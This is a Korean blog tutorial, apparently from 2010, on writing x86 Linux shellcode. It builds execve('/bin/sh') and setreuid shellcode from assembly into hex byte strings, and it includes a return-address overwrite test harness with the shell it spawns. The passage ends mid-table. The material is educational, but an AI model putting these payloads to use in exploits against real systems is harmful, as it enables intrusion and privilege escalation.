{"id":93,"date":"2010-04-17T22:09:26","date_gmt":"2010-04-18T07:09:26","guid":{"rendered":"\/blog\/?p=93"},"modified":"2023-09-21T09:41:17","modified_gmt":"2023-09-21T00:41:17","slug":"shellcode-%ec%9e%91%ec%84%b1-%eb%b0%a9%eb%b2%95","status":"publish","type":"post","link":"https:\/\/hasu0707.duckdns.org\/blog\/?p=93","title":{"rendered":"ShellCode \uc791\uc131 \ubc29\ubc95"},"content":{"rendered":"\n<P>[\ubaa9\ucc28]<br \/>1.\uc5b4\uc148\ube14\ub9ac \uae30\ubcf8 \uba85\ub839\uc5b4<br \/>2.\uae30\ubcf8\uc801\uc778 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 \uc774\ud574<br \/>3.C\ud504\ub85c\uadf8\ub7a8\uc744 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30.<br \/>4.setreuid(0,0)\ud568\uc218 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30<\/P>\n<P>\ubd80\ub85d : unistd.h<\/P>\n<P>1.\uc5b4\uc148\ube14\ub9ac \uae30\ubcf8 \uba85\ub839\uc5b4<br \/>\ub77c\ubca8 | \uc624\ud53c\ucf54\ub4dc |\uc81c1\uc624\ud53c\ub79c\ub4dc |\uc81c2\uc624\ud53c\ub79c\ub4dc | \uc124\uba85\ubb38(\uc8fc\uc11d)<br \/>------+-----------+------------+------------+--------------<br \/>main: movl %esi, %ebp ; comment<\/P>\n<P><br \/>+------+--------------------+---------------------------+--------------------+ <br \/>|\uba85\ub839\uc5b4| \uc774\uc6a9 \ubc29\ubc95 | \uba85\ub839\uc5b4\uc758 \uc758\ubbf8 | C\uc5d0\uc11c\uc758 \uc720\uc0ac \ud45c\ud604 |<br \/>+------+--------------------+---------------------------+--------------------+ <br \/>| mov | movb $0x1,%eax | 1\uc744 eax\uc5d0 \ub123\uc74c.(1 \ubc14\uc774\ud2b8) | eax = 0x01 | <br \/>| | movw $0x1,%eax | 1\uc744 eax\uc5d0 \ub123\uc74c.(2 \ubc14\uc774\ud2b8) | eax = 0x0001 | <br \/>| | movl $0x1,%eax | 1\uc744 eax\uc5d0 \ub123\uc74c.(4 \ubc14\uc774\ud2b8) | eax = 0x00000001 | <br \/>| add | addl $1, %eax | eax\uc5d0 1\uc744 \ub354\ud558\ub77c. | eax = eax + 1 |<br \/>| sub | subl $1, %eax | eax\uc5d0\uc11c 1\uc744 \ube7c\ub77c. | eax = eax - 1 |<br \/>| inc | incl %eax | eax\uc5d0 1\uc744 \uc99d\uac00. 
| eax++ |<br \/>| dec | decl %eax | eax\uc5d0 1\uc744 \uac10\uc18c. | eax-- |<br \/>| lea | leal 0x8(%esi),%eax| eax\uc5d0 esi+8\uc8fc\uc18c\ub97c \ub123\uc5b4\ub77c.| eax = esi + 8 |<br \/>| xor | xor %eax, %eax | \ub458\uc744 \ube44\uad50\ud574\uc11c \uac19\uc73c\uba74 0 | if(a==b) b=0 |<br \/>| jmp | jmp string | 0x1f\uc704\uce58\ub85c jump\ud558\ub77c. | goto string |<br \/>| call | call star | \uc11c\ube0c\ub8e8\ud2f4\uc744 call \ud568. | star() |<br \/>| ret | ret | \uc11c\ube0c\ub8e8\ud2f4\uc5d0\uc11c \uc6d0\ub798\ub85c \ubcf5\uadc0 | return |<br \/>| int | int $0x80 | system call \uc704\ud55c \uc778\ud130\ub7fd\ud2b8 | - |<br \/>| push | push %ebp | ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5 | - |<br \/>| pop | pop %esi | stack\uc5d0\uc11c \uaebc\ub0b4 esi\uc5d0 \uc800\uc7a5 | - |<br \/>+------+--------------------+---------------------------+--------------------+<\/P>\n<P>&nbsp;<\/P>\n<P>2.\uae30\ubcf8\uc801\uc778 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 \uc774\ud574<br \/>ex1)<br \/>-----------------------------------------------asm<br \/>.LC0:<br \/>.string \" a is %d \\n\"<br \/>.globl main<br \/>main:<br \/>pushl %ebp<br \/>movl %esp, %ebp<br \/>subl $4, %esp<br \/>movl $1, -4(%ebp)<br \/>pushl -4(%ebp)<br \/>pushl $.LC0<br \/>call printf<br \/>addl $8, %esp<br \/>leave<br \/>ret<br \/>-----------------------------------------------<\/P>\n<P>ex2)<br \/>-----------------------------------------------C<br \/>main()<br \/>{<br \/>write(1,\"I'm Willy in Null@Root\\n\",23);<br \/>}<br \/>-----------------------------------------------<\/P>\n<P>(gdb) disassemble main<br \/>Dump of assembler code for function main:<br \/>0x80481dc : push %ebp<br \/>0x80481dd : mov %esp,%ebp<br \/>0x80481df : push $0x17<br \/>0x80481e1 : push $0x808b1c8<br \/>0x80481e6 : push $0x1<br \/>0x80481e8 : call 0x804c390 &lt;__libc_write&gt;<br \/>0x80481ed : add $0xc,%esp<br \/>0x80481f0 : 
leave <br \/>0x80481f1 : ret <br \/>0x80481f2 : nop <br \/>0x80481f3 : nop <br \/>End of assembler dump.<br \/>(gdb) disassemble __libc_write<br \/>Dump of assembler code for function __libc_write:<br \/>0x804c390 &lt;__libc_write&gt;: push %ebx<br \/>0x804c391 &lt;__libc_write+1&gt;: mov 0x10(%esp,1),%edx<br \/>0x804c395 &lt;__libc_write+5&gt;: mov 0xc(%esp,1),%ecx<br \/>0x804c399 &lt;__libc_write+9&gt;: mov 0x8(%esp,1),%ebx<br \/>0x804c39d &lt;__libc_write+13&gt;: mov $0x4,%eax<br \/>0x804c3a2 &lt;__libc_write+18&gt;: int $0x80<br \/>0x804c3a4 &lt;__libc_write+20&gt;: pop %ebx<br \/>0x804c3a5 &lt;__libc_write+21&gt;: cmp $0xfffff001,%eax<br \/>0x804c3aa &lt;__libc_write+26&gt;: jae 0x804cab0 &lt;__syscall_error&gt;<br \/>0x804c3b0 &lt;__libc_write+32&gt;: ret <br \/>End of assembler dump.<\/P>\n<P>------------------------------------------------asm<br \/>.LC0:<br \/>.string \"I'm Willy in Null@Root\\n\" <br \/>.globl main<br \/>main:<br \/>movl $0x04, %eax<br \/>movl $0x01, %ebx<br \/>movl $.LC0, %ecx<br \/>movl $0x17, %edx<br \/>int $0x80 <br \/>movl $0x01, %eax<br \/>movl $0x00, %ebx<br \/>int $0x80 <br \/>ret<br \/>------------------------------------------------<br \/>.globl main<br \/>main:<br \/>jmp strings<br \/>start: popl %esi<br \/>movl $0x04, %eax<br \/>movl $0x01, %ebx<br \/>movl %esi, %ecx<br \/>movl $0x17, %edx<br \/>int $0x80<br \/>movl $0x01, %eax<br \/>movl $0x00, %ebx<br \/>int $0x80<br \/>strings:call start<br \/>.string \"I'm Willy in Null@Root\\n\" <br \/>------------------------------------------------<\/P>\n<P>&nbsp;<\/P>\n<P>3.C\ud504\ub85c\uadf8\ub7a8\uc744 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30<br \/>-----------------------------<br \/>#include <br \/>main()<br \/>{<br \/>char *name[2];<br \/>name[0] = \"\/bin\/sh\";<br \/>name[1] = NULL;<br 
\/>execve(name[0],name,NULL);<br \/>}<br \/>-----------------------------<\/P>\n<P><br \/>[willy@Null@Root]$ gcc test51.c -o test51 -mpreferred-stack-boundary=2 -static<\/P>\n<P>[willy@Null@Root]$ gdb -q test51<br \/>(gdb) disassemble main<br \/>Dump of assembler code for function main:<br \/>0x80481dc : push %ebp<br \/>0x80481dd : mov %esp,%ebp<br \/>0x80481df : sub $0x8,%esp<br \/>0x80481e2 : movl $0x808b228,0xfffffff8(%ebp)<br \/>0x80481e9 : movl $0x0,0xfffffffc(%ebp)<br \/>0x80481f0 : push $0x0<br \/>0x80481f2 : lea 0xfffffff8(%ebp),%eax<br \/>0x80481f5 : push %eax<br \/>0x80481f6 : pushl 0xfffffff8(%ebp)<br \/>0x80481f9 : call 0x804c36c &lt;__execve&gt;<br \/>0x80481fe : add $0xc,%esp<br \/>0x8048201 : leave <br \/>0x8048202 : ret <br \/>0x8048203 : nop <br \/>End of assembler dump.<br \/>(gdb) disassemble __execve<br \/>Dump of assembler code for function __execve:<br \/>0x804c36c &lt;__execve&gt;: push %ebp<br \/>0x804c36d &lt;__execve+1&gt;: mov $0x0,%eax<br \/>0x804c372 &lt;__execve+6&gt;: mov %esp,%ebp<br \/>0x804c374 &lt;__execve+8&gt;: test %eax,%eax<br \/>0x804c376 &lt;__execve+10&gt;: push %edi<br \/>0x804c377 &lt;__execve+11&gt;: push %ebx<br \/>0x804c378 &lt;__execve+12&gt;: mov 0x8(%ebp),%edi<br \/>0x804c37b &lt;__execve+15&gt;: je 0x804c382 &lt;__execve+22&gt;<br \/>0x804c37d &lt;__execve+17&gt;: call 0x0<br \/>0x804c382 &lt;__execve+22&gt;: mov 0xc(%ebp),%ecx<br \/>0x804c385 &lt;__execve+25&gt;: mov 0x10(%ebp),%edx<br \/>0x804c388 &lt;__execve+28&gt;: push %ebx<br \/>0x804c389 &lt;__execve+29&gt;: mov %edi,%ebx<br \/>0x804c38b &lt;__execve+31&gt;: mov $0xb,%eax<br \/>0x804c390 &lt;__execve+36&gt;: int $0x80<br \/>0x804c392 &lt;__execve+38&gt;: pop %ebx<br \/>0x804c393 &lt;__execve+39&gt;: mov %eax,%ebx<br \/>0x804c395 &lt;__execve+41&gt;: cmp $0xfffff000,%ebx<br \/>0x804c39b &lt;__execve+47&gt;: jbe 0x804c3ab &lt;__execve+63&gt;<br \/>0x804c39d &lt;__execve+49&gt;: neg %ebx<br \/>0x804c39f &lt;__execve+51&gt;: call 0x80483b4 
&lt;__errno_location&gt;<br \/>0x804c3a4 &lt;__execve+56&gt;: mov %ebx,(%eax)<br \/>0x804c3a6 &lt;__execve+58&gt;: mov $0xffffffff,%ebx<br \/>0x804c3ab &lt;__execve+63&gt;: mov %ebx,%eax<br \/>0x804c3ad &lt;__execve+65&gt;: pop %ebx<br \/>0x804c3ae &lt;__execve+66&gt;: pop %edi<br \/>0x804c3af &lt;__execve+67&gt;: pop %ebp<br \/>0x804c3b0 &lt;__execve+68&gt;: ret <br \/>End of assembler dump.<\/P>\n<P>----------------------------------------------------------------------------------------<br \/>.globl main<br \/>main:<br \/>jmp strings<br \/>start: popl %esi &lt;--- \ubb38\uc790\uc5f4 \uc704\uce58 (\ubb38\uc790\uc5f4\uc740 \/bin\/sh 7\uc790)<br \/>movb $0x00,0x7(%esi) &lt;--- \ubb38\uc790\uc5f4 \ub05d\uc5d0 NULL\uc704\uce58 (\ubb38\uc790\uc5f4\uc774 \ub05d\ub0a8\uc744 \uc54c\ub9bc)<br \/>movl %esi, 0x8(%esi) &lt;--- name[0]\uc744 \uad6c\ud604\ud558\uae30 \uc704\ud574 \ubb38\uc790\uc5f4 \ub4a4\uc5d0 \ub123\uc74c.<br \/>movl $0x00,0xc(%esi) &lt;--- name[1]\uc744 \uad6c\ud604\ud558\uae30 \uc704\ud574\uc11c name[0]\ub4a4\uc5d0 NULL\uc744 \ub123\uc74c.<br \/>movl $0x0b,%eax &lt;--- %eax\uc5d0 0xb(11)\uc744 \ub123\uc5b4 execve() system call\ud568. <br \/>movl %esi, %ebx &lt;--- %ebx\uc5d0 \ubb38\uc790\uc5f4\uc744 \ub123\uc74c.<br \/>leal 0x8(%esi), %ecx &lt;--- %ecx\uc5d0 name = name[0]+name[1]\uc744 \ub123\uc74c.<br \/>movl 0xc(%esi), %edx &lt;--- %edx\uc5d0 NULL(0x00)\uc744 \ub123\ub294\ub2e4.<br \/>int $0x80 &lt;--- interrupt 0x80\uc744 \ud574\uc11c system call\uc744 \ud568.<br \/>movl $0x01,%eax<br \/>movl $0x00,%ebx<br \/>int $0x80 &lt;--- exit(0) system call. 
<br \/>strings: call start<br \/>.string \"\/bin\/sh\"<br \/>----------------------------------------------------------------------------------------<\/P>\n<P>[willy@Null@Root]$ objdump -d test51<\/P>\n<P>:<br \/>0804841c :<br \/>804841c: eb 2a jmp 8048448 <\/P>\n<P>0804841e :<br \/>804841e: 5e pop %esi<br \/>804841f: c6 46 07 00 movb $0x0,0x7(%esi)<br \/>8048422: 89 76 08 mov %esi,0x8(%esi)<br \/>8048426: c7 46 0c 00 00 00 00 movl $0x0,0xc(%esi)<br \/>804842d: b8 0b 00 00 00 mov $0xb,%eax<br \/>8048432: 89 f3 mov %esi,%ebx<br \/>8048434: 8d 4e 08 lea 0x8(%esi),%ecx<br \/>8048437: 8b 56 0c mov 0xc(%esi),%edx<br \/>804843a: cd 80 int $0x80<br \/>804843c: b8 01 00 00 00 mov $0x1,%eax<br \/>8048441: bb 00 00 00 00 mov $0x0,%ebx<br \/>8048446: cd 80 int $0x80<\/P>\n<P>08048448 :<br \/>8048448: e8 d1 ff ff ff call 804841e <br \/>804844d: 2f das <br \/>804844e: 62 69 6e bound %ebp,0x6e(%ecx)<br \/>8048451: 2f das <br \/>8048452: 73 68 jae 80484bc <\/P>\n<P><br \/>----------------------------------------------------------------------------------------<br \/>\uc218\uc815\uc804 | \uc218\uc815\ud6c4 <br \/>----------------------------+------------------------------<br \/>movb $0x00,0x7(%esi) | xor %eax, %eax<br \/>| movb %al, 0x7(%esi)<br \/>movl $0x00,0xc(%esi) | movl %eax, 0xc(%esi)<br \/>movl 0xc(%esi), %edx | xor %edx, %edx<\/P>\n<P>[willy@Null@Root]$ cat test52.s<br \/>.globl main<br \/>main:<br \/>jmp strings<br \/>start: popl %esi<br \/>movl %esi, 0x8(%esi)<br \/>xor %eax, %eax<br \/>movb %al, 0x7(%esi)<br \/>movl %eax, 0xc(%esi)<br \/>movb $0x0b, %al<br \/>movl %esi, %ebx<br \/>leal 0x8(%esi), %ecx<br \/>xor %edx, %edx<br \/>int $0x80<br \/>movb $0x01,%al<br \/>xor %ebx, %ebx<br \/>int $0x80<br \/>strings:call start<br \/>.string \"\/bin\/sh\"<br \/>----------------------------------------------------------------------------------------<\/P>\n<P>char sc1[] =<br \/>\"\\xeb\\x1d\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\"<br 
\/>\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xde\\xff\\xff\\xff\/bin\/sh\";<\/P>\n<P>main()<br \/>{<br \/>int *ret;<\/P>\n<P>ret = (int *)&amp;ret + 2;<br \/>(*ret) = (int)sc1;<br \/>}<\/P>\n<P>[willy@Null@Root]$ gcc test44.c -o test44<\/P>\n<P>[willy@Null@Root]$ .\/test44<br \/>sh-2.04$ ps<br \/>PID TTY TIME CMD<br \/>9238 pts\/6 00:00:00 bash<br \/>9262 pts\/6 00:00:00 sh<br \/>9264 pts\/6 00:00:00 ps<\/P>\n<P><br \/>4.setreuid(0,0)\ud568\uc218 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30<br \/>-------------------------------------------------------------------------------------<\/P>\n<P>main()<br \/>{<br \/>setreuid(0,0);<br \/>}<\/P>\n<P>-------------------------------------------------------------------------------------<br \/>.globl main<\/P>\n<P>main:<br \/>movl $0x0, %ecx<br \/>movl $0x0, %ebx<br \/>movl $0x46, %eax<br \/>int $0x80<\/P>\n<P>-------------------------------------------------------------------------------------<\/P>\n<P>080483d0 :<br \/>80483d0: b9 14 0c 00 00 mov $0xc14,%ecx<br \/>80483d5: bb 14 0c 00 00 mov $0xc14,%ebx<br \/>80483da: b8 46 00 00 00 mov $0x46,%eax<br \/>80483df: cd 80 int $0x80<\/P>\n<P>-------------------------------------------------------------------------------------<\/P>\n<P>.globl main<\/P>\n<P>main:<br \/>xor %ecx, %ecx<br \/>movw $0xc14, %cx<br \/>xor %ebx, %ebx<br \/>movw $0xc14, %bx<br \/>xor %eax, %eax<br \/>movb $0x46, %al<br \/>int $0x80<\/P>\n<P>-------------------------------------------------------------------------------------<\/P>\n<P>080483d0 :<br \/>80483d0: 31 c9 xor %ecx,%ecx<br \/>80483d2: 66 b9 14 0c mov $0xc14,%cx<br \/>80483d6: 31 db xor %ebx,%ebx<br \/>80483d8: 66 bb 14 0c mov $0xc14,%bx<br \/>80483dc: 31 c0 xor %eax,%eax<br \/>80483de: b0 46 mov $0x46,%al<br \/>80483e0: cd 80 int $0x80<br \/>80483e2: 89 f6 mov %esi,%esi<\/P>\n<P>-------------------------------------------------------------------------------------<\/P>\n<P>\"\\x31\\xc9\" \/* xor %ecx,%ecx *\/<br 
\/>\"\\x66\\xb9\\x14\\x0c\" \/* mov $0xc14,%cx *\/<br \/>\"\\x31\\xdb\" \/* xor %ebx,%ebx *\/<br \/>\"\\x66\\xbb\\x14\\x0c\" \/* mov $0xc14,%bx *\/<br \/>\"\\x31\\xc0\" \/* xor %eax,%eax *\/<br \/>\"\\xb0\\x46\" \/* mov $0x46,%al *\/<br \/>\"\\xcd\\x80\" \/* int $0x80 *\/<\/P>\n<P>------------------------------------------------------------------------------------- <\/P>\n<P>\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141<\/P>\n<DIV id=contents>\n<P>------------------------------------------------------------------------------------------ <br \/>Shellcode\ub97c \ub9cc\ub4e4\uae30 \uc704\ud574\uc11c\ub294 \uae30\ubcf8\uc801\uc73c\ub85c \uba54\ubaa8\ub9ac \uad6c\uc870\uc640 \uac04\ub2e8\ud55c \uc5b4\uc148\ube14\ub9ac\uc5b4\uc5d0 \ub300\ud55c \uc774\ud574\ub97c \ud544\uc694 <br \/>\ub85c\ud55c\ub2e4.&nbsp; \ucd5c\uadfc Shellcode\uc5d0 \uad00\ud55c \ub9ce\uc740 \ubb38\uc11c\ub4e4\uc774 \uc18c\uac1c\ub418\uace0 \uc788\uc73c\ub098 \uba54\ubaa8\ub9ac\ub098 \uc5b4\uc148\ube14\ub9ac\uc5d0 \ub300\ud558\uc5ec <br \/>\uc5b4\ub290 \uc815\ub3c4 \uc54c\uace0 \uc788\ub294 \uc0ac\ub78c\uc744 \ub300\uc0c1\uc73c\ub85c \uc18c\uac1c\ub418\uace0 \uc788\uc5b4 \uae30\uacc4\uc5b4 Code\ub97c \ucc98\uc74c \uc811\ud558\ub294 \uc0ac\ub78c\ub4e4\uc5d0\uac8c\ub294&nbsp; <br \/>\uc804\uccb4 \ud750\ub984\uc744 \ud30c\uc545\ud558\ub294\ub370 \uc5b4\ub824\uc6c0\uc774 \uc788\ub2e4. 
<br \/>\uc774 \ubb38\uc11c\uc5d0\uc11c\ub294 \uac00\uc7a5 \uae30\ubcf8\uc774 \ub418\ub294 \uba54\ubaa8\ub9ac\uc758 \uad6c\uc870 \/ \ub808\uc9c0\uc2a4\ud130 \/ \uc5b4\uc148\ube14\ub9ac\uc758 \uae30\ubcf8\uc801\uc778 \uba85\ub839\uc5b4\ubd80\ud130 <br \/>\uc2dc\uc791\ud558\uc5ec Shellcode \uc81c\uc791\uacfc \uc218\uc815\ubfd0\ub9cc\uc544\ub2c8\ub77c, \uc784\uc758 \uae30\ub2a5\uc758 system call\uc744 \uc218\ud589\ud558\uae30 \uc704\ud55c \uae30\uacc4\uc5b4 <br \/>code\ub97c \ub9cc\ub4dc\ub294 \uac83\uc744 \uc124\uba85\ud558\uc600\ub2e4. &nbsp; <br \/>\ucc38\uace0\ub85c \uc774\ubb38\uc11c\uc5d0 \uc18c\uac1c\ub41c \ubaa8\ub4e0 \ub0b4\uc6a9\uc740 Linux Red Hat 7.0 i686\uc744 \uae30\ubcf8\uc73c\ub85c \ub9cc\ub4e4\uc5b4 \uc84c\uc73c\ubbc0\ub85c CPU <br \/>,OS\uc5d0 \ub530\ub77c\uc11c \ub2e4\uc18c \ucc28\uc774\uac00 \uc788\uc744\uc218 \uc788\ub2e4.&nbsp; <br \/>\uae30\ud0c0 \uc774 \ubb38\uc11c\uc5d0 \ub300\ud55c \uc9c8\ubb38 \/ \uc9c0\uc801\uc0ac\ud56d\uc774 \uc788\ub294 \uc0ac\ub78c\uc740 Willy (jeazon@hanmail.net)\uc5d0\uac8c \uc5f0\ub77d\ubc14\ub78c. <br \/>------------------------------------------------------------------------------------------ <br \/><br \/>&lt;Test System \uc815\ubcf4&gt; <br \/>CPU: GenuineIntel Pentium II 266MHz <br \/>OS : Linux Redhat 7.0 i686 <br \/>GCC: (GNU) 2.96 20000731&nbsp; <br \/>GDB: GNU gdb 5.0 <br \/><br \/>&lt;\uc2a4\ud14d\uacfc \ub808\uc9c0\uc2a4\ud130&gt; <br \/>\uc2a4\ud14d(stack)\uc740 \uba54\ubaa8\ub9ac\uc758 \uc601\uc5ed\uc774\uba70, \uc601\uc5b4\uc758 \ub73b\uc744 \ubcf4\uba74 \"\uc313\uc544\uc62c\ub9b0 \uac83\" \uc800\uc7a5\uacf5\uac04\uc774 \uc313\uc544 \uc62c\ub9ac\ub294 \ud615\ud0dc\ub85c <br \/>\ub418\uc5b4\uc788\ub2e4\ub294 \uc758\ubbf8\uc774\ub2e4. 
\uc6b0\ub9ac\uac00 \ud504\ub85c\uadf8\ub7a8\uc744 \uc218\ud589\ud558\uba74\uc11c \uc0dd\uc131\ub41c data\ub098 \uc785\ub825\uc744 \ud1b5\ud558\uc5ec \ub9cc\ub4e4\uc5b4\uc9c4 data\ub294&nbsp; <br \/>\uc77c\ub2e8 \uc774 \uc2a4\ud14d\uc5d0 \uc313\uc600\ub2e4\uac00 \ud544\uc694\uc2dc CPU\ub85c \ubcf4\ub0b4\uc838 \uacc4\uc0b0\ub41c\uace0 \uadf8 \uacb0\uacfc\ubb3c\uc774 \ub2e4\uc2dc \uc2a4\ud14d\uc5d0 \uc313\uc774\uac8c \ub41c\ub2e4.&nbsp; <br \/>\uc2a4\ud14d\uc5d0 \uc313\uc5ec \uc788\ub294 data\ub294 \uc8fc\uc18c(address)\ub97c \uc774\uc6a9\ud558\uc5ec \uc81c\uc5b4\ub41c\ub2e4. \uc2a4\ud14d\uc740 2\uac00\uc9c0 \ud2b9\uc9d5\uc774 \uc788\ub294\ub370 \ud558\ub098\ub294 <br \/>data\ub97c push(\ucd94\uac00)\ud558\uba74 \ub0ae\uc740 \uc8fc\uc18c \ucabd\uc73c\ub85c \uc313\uc778\ub2e4 \uac83\uacfc, \ub098\uc911\uc5d0 \ub4e4\uc5b4\uac04 data\uac00 \uba3c\uc800 \ub098\uc624\ub294 lifo(last <br \/>in first out)\uac1c\ub150\uc73c\ub85c \ud56d\uc544\ub9ac\uc5d0 \ubb3c\uac74\uc744 \ub123\uc5c8\ub2e4\uac00 \uaebc\ub0bc\ub54c \ub9e8 \ub4a4\uc5d0 \ub123\uc740 \uac83\uc774 \ub9e8 \uba3c\uc800 \ub098\uc624\ub294 \uac83\uacfc&nbsp; <br \/>\uac19\ub2e4. \uc774\uac83\uc744 \ub3c4\uc2dd\ud654 \ud558\uba74 \uc544\ub798\uc640 \uac19\ub2e4.. 
<br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data in\/out <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; 0xfffffffb &nbsp;&nbsp; \ud558\uc704 \uc8fc\uc18c <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; data 4 &nbsp; | &nbsp; &nbsp; 0xfffffffc <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; data 3&nbsp; &nbsp;| &nbsp; &nbsp; 0xfffffffd &nbsp; &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; data 2&nbsp; &nbsp;| &nbsp; &nbsp; 0xfffffffe <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; data 1&nbsp; &nbsp;| &nbsp; &nbsp; 0xffffffff &nbsp; &nbsp; \uc0c1\uc704 \uc8fc\uc18c <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/><br \/>\ub808\uc9c0\uc2a4\ud130(register)\ub294 CPU\uc758 \uc601\uc5ed\uc73c\ub85c \uace0\uc18d\uc5f0\uc0b0\uc744 \ud558\uae30\uc704\ud574 \uc0ac\uc6a9\ub418\ub294 unit\uc774\ub2e4. \ub808\uc9c0\uc2a4\ud130\uc5d0\ub294 ax,bx, <br \/>cx,dx,si,di,bp,sp\uc2dd\uc73c\ub85c \uc774\ub984\uc774 \ubd99\uc5b4 \uc788\ub294\ub370, \uc774\uac83\uc740 \uc0ac\ub78c\uc5d0\uac8c \uc774\ub984\uc744 \ubd99\uc5ec \uac01 \uac1c\uc778\uc758 \uace0\uc720 id\ub97c&nbsp; <br \/>\ubd80\uc5ec\ud558\ub294 \uac83\uacfc \uac19\ub2e4. \uc989 \uba85\ub839\uc744 \uc218\ud589\ud560\ub54c \uc704\uce58\ub97c \ucc3e\uae30 \uc704\ud574 \uc0ac\uc6a9\ub41c\ub2e4\uace0 \ubcf4\uba74\ub41c\ub2e4. \ub808\uc9c0\uc2a4\ud130\uc758 \uc885\ub958\ub294&nbsp; <br \/>\uc77c\ubc18\ubaa9\uc801 \ub808\uc9c0\uc2a4\ud130(general-purpose register), \uc0c1\ud0dc \ub808\uc9c0\uc2a4\ud130(status register)\uc640 \uc138\uadf8\uba3c\ud2b8 \ub808\uc9c0 <br \/>\uc2a4\ud130(segment register)\ub4f1\uc774 \uc788\ub294\ub2e4. 
\uadf8\uc911\uc5d0\uc11c \uc77c\ubc18\uc801\uc73c\ub85c \uac00\uc7a5 \ub9ce\uc774 \uc4f0\uc774\uba70 \uae30\ubcf8\uc774 \ub418\ub294 \uc77c\ubc18\ubaa9\uc801\uc758 <br \/>\ub808\uc9c0\uc2a4\ud130(general-purpose register)\ub9cc \uc774\ud574\ud574\ub3c4 shellcode\ub97c \ub9cc\ub4dc\ub294\ub370 \ud070 \ubb34\ub9ac\uac00 \uc5c6\uc744 \uac83\uc73c\ub85c \uc0dd\uac01 <br \/>\ub41c\ub2e4. <\/P>\n<P>\uc77c\ubc18\ubaa9\uc801\uc758 \ub808\uc9c0\uc2a4\ud130\uc758 8\uac1c(<FONT color=#d41a01>ax,bx,cx,dx,si,di,bp,sp<\/FONT>) \uc815\ub3c4\uac00 \uc788\uc73c\uba70, <\/P>\n<P>\uadf8\uc911\uc5d0 <U><STRONG><FONT color=#0000ff>ax,bx,cx,dx\ub294 \uacc4\uc0b0\uc744 \uc704\ud574 \uc9c1\uc811\uc801\uc73c\ub85c data<\/FONT><\/STRONG><\/U>\ub97c \uc8fc\uace0 \ubc1b\ub294 \ub808\uc9c0\uc2a4\ud130\uc774\uba70, <\/P>\n<P><FONT color=#008000><STRONG><U>si,di,bp,sp\ub294 \uc8fc\uc18c\ub97c \uc8fc\uace0 \ubc1b\ub294 \ub808\uc9c0\uc2a4\ud130 <\/U><\/STRONG><\/FONT>\uc774\ub2e4. <\/P>\n<P>32\ube44\ud2b8 CPU\uc5d0\uc11c\ub294 \uc8fc\uc18c\uac00 4\ubc14\uc774\ud2b8(32\ube44\ud2b8)\uc774\ubbc0\ub85c \"e\"\ub97c \ubd99\uc5ec\uc11c 4\ubc14\uc774\ud2b8\ub85c \ud655\uc7a5\ud558\uc5ec <\/P>\n<P>\uc77c\ubc18\uc801\uc73c\ub85c&nbsp; \uc0ac\uc6a9\ud55c\ub2e4. 
<\/P>\n<P>\uc989 \uc774\uc81c si,di,bp,sp\uc758 \ud655\uc7a5 \uac1c\ub150\uc778 esi,edi,ebp,esp\ub9cc \uae30\uc5b5\ud558\uba74 \ub41c\ub2e4.&nbsp; <\/P>\n<P><br \/><br \/>&nbsp; &nbsp; &nbsp;&nbsp; general &nbsp;&nbsp; | &nbsp; status &nbsp; &nbsp; &nbsp;|&nbsp; segment <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ----------+------------+---------- <br \/>&nbsp; &nbsp; &nbsp;&nbsp; eax(ax) &nbsp; &nbsp; &nbsp; &nbsp; eflags &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; cs <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ebx(bx) &nbsp; &nbsp; &nbsp; &nbsp; eip &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ds <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ecx(cx) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ss&nbsp; <br \/>&nbsp; &nbsp; &nbsp;&nbsp; edx(dx) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; es <br \/>&nbsp; &nbsp; &nbsp;&nbsp; esi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; fs <br \/>&nbsp; &nbsp; &nbsp;&nbsp; edi &nbsp; 